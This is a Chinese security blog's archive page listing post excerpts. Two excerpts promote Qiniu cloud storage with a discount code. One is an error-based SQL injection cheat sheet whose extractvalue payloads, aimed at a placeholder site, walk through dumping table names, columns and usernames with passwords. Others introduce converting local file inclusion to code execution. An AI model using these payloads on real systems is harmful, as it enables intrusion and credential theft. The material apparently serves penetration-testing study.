您当前位置: 首页 » 一月 2017
按日期归档: 一月 2017 - 第2页

从七牛的优势看我为什么选择七牛

既然推荐七牛,那么就得说说七牛的优势,在说之前给大家推荐一个七牛优惠码:61d1fd4d 

优惠码是九折,1万以下99折,一万以上95折,目前七牛所有的优惠码都是统一折扣的,建议大家收藏使用,永久有效。

下面进入正题,七牛是目前国内数一数二的云存储厂商了,但不是第一个开始做这个的,既然能超越前人,肯定有其过人之处。

1.免费流量和额度

readmore

sql报错注入语句汇总(自己整理的)

一、extractvalue
www.vuln-web.com/index.php?view=-35″ union select 1,2,3,4,5–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select database())))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select count(username,0x3a,password) from users limit 0,1)))–

readmore

Lfi转换为rce可能用到的一些协议

当发现Lfi的时候,可以用一些协议把lfi转换为rce进而利用,这里分享一些在渗透测试时可能会用到的协议和lfi能够进行fuzz的一些敏感文件列表。

file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs

readmore

如何让微信小程序快速接入七牛云

如果你确定用七牛运行小程序的话,给大家分享一个九折优惠码:61d1fd4d1 月 9 日 微信小程序正式发布,小程序终于揭开了它神秘的面纱,开发者对小程序的追捧更是热度不减。从小程序的热门应用场景来看,大概可以分为两大类,一类是低使用频率的 App,如金融类的银行或保险公司 App,O2O 类的上门做饭、家政 App;另一类是虽然使用频率高但是功能简单的 App,如工具类的天气、快递查询,富媒体类的资讯 App 等。
那么,谁将成为小程序的大赢家?要打造独角兽级别的微信小程序,开发者除了要注重小程序的应用场景及自身业务逻辑的创新,还需要关注用户体验的提升,而小程序前端的用户体验又与支撑小程序的后端服务息息相关。 

readmore

如何优雅的把lfi转化为rce(2017-02-27更新版)

最近lfi+phpinfo利用挺火的,我又在知识库里搜了一下,文件包含的文章不少,但是对于lfi的总结文章还没有。于是总结一下,部分翻译自老外文章,自带一点自己的理解和部分老外没提及到的知识点。此外还整理里一篇lfi转换为rce可能用到的协议

Lfi如果没有上传点的话,在很多人眼里如同鸡肋,食之无味弃之可惜。其实网上已经有很多方法把lfi转化成为rce。

readmore